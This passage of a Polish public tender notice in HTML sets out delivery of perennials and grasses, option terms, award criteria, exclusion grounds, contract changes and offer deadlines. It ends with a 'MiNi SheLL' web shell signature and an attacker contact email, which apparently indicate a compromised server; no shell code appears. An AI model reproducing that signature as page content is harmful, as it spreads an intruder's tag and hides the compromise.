zamówień publicznych (t.j. Dz.U. z 2023<br/>r., poz. 1605) w sytuacji, gdy Wykonawca w ofercie wyznaczy termin dostaw materiału roślinnego dłuższy niż 14 dni<br/>kalendarzowych.<br/>3. W przypadku gdy Wykonawca wcale nie określi w ofercie terminu dostawy Zamawiający przyjmie, iż Wykonawca zaoferował<br/>termin dostaw roślin 14 dni kalendarzowych.<br/>4. W przypadku podania przez Wykonawcę terminu dostawy krótszego niż 2 dni kalendarzowe, do oceny i porównania ofert oraz do<br/>rozliczeń wynikających z umowy zostanie przyjęty termin dostaw roślin 2 dni kalendarzowe.<br/>5. Termin dostaw roślin wskazany przez Wykonawcę w ofercie będzie wiążący na etapie realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części III jest sukcesywna dostawa bylin i traw. Szczegółowy opis zawarty został w<br/>Załączniku nr 1 do SWZ (Opis przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w zakresie zadania przewiduje usługi, o których mowa w SWZ w ramach zadania podstawowego oraz<br/>zamówienia w ramach prawa opcji, zgodnie z art. 441 ustawy Pzp.<br/>2. Wykonawca jest obowiązany, po uprzednim otrzymaniu od Zamawiającego pisemnego zawiadomienia, dostarczyć<br/>materiał roślinny objęty prawem opcji w liczbie wskazanej w Załączniku nr 3 do SWZ. Skorzystanie z prawa opcji nie<br/>wymaga zawarcia aneksu do umowy.<br/>3. Zamawiający może skorzystać z prawa opcji nie później niż w terminie do dnia 31.12.2024 r.<br/>4. Zamawiający nie ma obowiązku skorzystania z prawa opcji. Zamawiający może skorzystać z opcji tylko częściowo.<br/>Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>5. Zamawiający może skorzystać z opcji stopniowo, składając Wykonawcy oświadczenia w różnych terminach, jednak nie<br/>przekraczających terminu wskazanego w ust. 2 aż do osiągnięcia maksymalnego zakresu zamówienia opisanego w<br/>Załączniku nr 3 do SWZ.<br/>6. Postanowienia umowy stosuje się odpowiednio do przedmiotu zamówienia objętego prawem opcji.<br/>7. Cena jednostkowa materiału roślinnego objętego prawem opcji będzie taka sama jak dla zamówienia podstawowego.<br/>8. Warunki dostawy materiału roślinnego objętego prawem opcji oraz warunki świadczenia przez Wykonawcę usług<br/>zawartych w ich cenie jednostkowej są takie same, jak w zamówieniu podstawowym.<br/>9. Określenie gatunków oraz ilości materiału roślinnego w ramach poszczególnych gatunkach w zakresie prawa opcji<br/>została określona w Załączniku nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert:<br/>1) Opis sposobu oceny ofert według kryterium „Cena ofertowa” – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w formularzu ofertowym. Pozostałe<br/>oferty zostaną ocenione wg wzoru wskazanego w SWZ.<br/>2) Opis sposobu oceny ofert według kryterium „Termin dostawy materiału roślinnego – waga kryterium to 40 pkt.<br/>W przedmiotowym kryterium oceniany będzie podany przez Wykonawcę w formularzu ofertowym termin dostawy materiału<br/>roślinnego wraz z rozładunkiem. Termin dostawy roślin Wykonawca winien podać w pełnych dniach kalendarzowych, licząc od dnia<br/>złożenia zapotrzebowania przez Zamawiającego. Maksymalną liczbę punktów otrzyma oferta z najkrótszym terminem wykonania<br/>dostawy (30 pkt). Pozostałe oferty zostaną ocenione wg wzoru wskazengo w SWZ:<br/>Zamawiający zastrzega, że w przypadku kryterium termin dostawy roślin:<br/>1. Zamawiający zastrzega, że termin dostaw materiału roślinnego nie może być dłuższy niż 14 dni kalendarzowych. Termin ten<br/>będzie liczony od dnia zgłoszenia zapotrzebowania przez Zamawiającego (w formie faksu lub drogą elektroniczną).<br/>2. Dokona odrzucenia oferty Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy – Prawo zamówień publicznych (t.j. Dz.U. z 2023<br/>r., poz. 1605) w sytuacji, gdy Wykonawca w ofercie wyznaczy termin dostaw materiału roślinnego dłuższy niż 14 dni<br/>kalendarzowych.<br/>3. W przypadku gdy Wykonawca wcale nie określi w ofercie terminu dostawy Zamawiający przyjmie, iż Wykonawca zaoferował<br/>termin dostaw roślin 14 dni kalendarzowych.<br/>4. W przypadku podania przez Wykonawcę terminu dostawy krótszego niż 2 dni kalendarzowe, do oceny i porównania ofert oraz do<br/>rozliczeń wynikających z umowy zostanie przyjęty termin dostaw roślin 2 dni kalendarzowe.<br/>5. Termin dostaw roślin wskazany przez Wykonawcę w ofercie będzie wiążący na etapie realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy<br/>na podstawie art. 125 ust. 1 Pzp– wg Załącznika nr 4 do SWZ.<br/>Oświadczenie , o którym mowa powyżej stanowi dowód potwierdzający brak podstaw do wykluczenia oraz spełnienie warunków na<br/>dzień składania ofert, tymczasowo zastępujący przez Zamawiającego podmiotowe środki dowodowe, wskazane wSWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców Oświadczenie, o którym mowa w ustępie powyżej składa<br/>każdy z Wykonawców.<br/>- Zobowiązanie podmiotu udostępniającego zasoby - wg Załącznika nr 6 do SWZ – jeżeli dotyczy.<br/>- Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 Pzp– wg Załącznika nr 9 do SWZ -jeżeli dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Oświadczenie Wykonawcy<br/>na podstawie art. 125 ust. 1 ustawy Pzp – wg Załącznika nr 4 do SWZ<br/>- Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 Pzp– wg Załącznika nr 9 do SWZ – jeżeli<br/>dotyczy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający na podstawie art. 274 ust. 1 Pzp wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni kalendarzowych od dnia wezwania, podmiotowych środków dowodowych:<br/>1) W celu potwierdzenia braku podstaw do wykluczenia z postępowania Wykonawca składa:<br/>a) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wg Załącznika nr 10 do SWZ.<br/>b) Oświadczenie podmiotu udostępniającego zasoby o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wg<br/>Załącznika nr 11 do SWZ – jeżeli dotyczy.<br/>c) Odpis albo informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Informacji o Działalności Gospodarczej,<br/>w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, wystawionych nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu na podstawie art.<br/>109 ust. 1 pkt 4) ustawy Pzp skorzysta z dokumentów znajdujących się w ogólnie dostępnych i bezpłatnych bazach danych,<br/>pod warunkiem wskazania przez Wykonawcę w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik nr 4<br/>do SWZ) danych umożliwiających dostęp do tych dokumentów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zgodnie z postanowieniami art. 455 ust.1 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem podpisania aneksu zaakceptowanego przez obydwie Strony. W szczególności Zamawiający dopuszcza: <br/>1)	aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazw firmy, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy itp., Zmniejszenie zakresu (asortymentu lub ilości) dostarczanych roślin oraz związane z tym zmniejszenie wartości umowy,<br/>2)	wystąpienia uzasadnionych zmian w zakresie sposobu wykonania i finansowania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego, <br/>3)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, <br/>4)	zmiana terminu realizacji przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy<br/>5)	zmiana sposobu wykonywania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy,<br/>6)	dostosowanie umowy do zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia,<br/>7)	wprowadzenie podwykonawcy w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, konieczne będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę podwykonawcą, który będzie realizować część przedmiotu umowy,<br/>8)	gdy zajdą inne okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w dniu zawarcia umowy.<br/>2.	Warunkiem dokonania zmiany do umowy jest: <br/>1)	Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, na które powołuje się jako podstawę zmiany umowy,<br/>2)	wniosek o zmianę postanowień umowy musi być wyrażony na piśmie,<br/>3)	wniosek, o którym mowa w pkt 2 musi zawierać:<br/>a) opis propozycji zmiany, <br/>b) uzasadnienie zmiany,<br/>c) opis wpływu zmiany na warunki realizacji umowy.<br/>3. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy, co zostanie potwierdzone protokołem sporządzonym przez przedstawicieli obu stron.<br/>4. Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem nieważności.<br/>5. Zgodnie z art. 439 ustawy Pzp Strony przewidują możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy, o<br/>którym mowa § 5 ust. 1 Umowy (zmiana ceny jednostkowej) na zasadach określonych we wzorze umowy (Załącznik nr 8 do<br/>SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mzz_leszno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-18 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com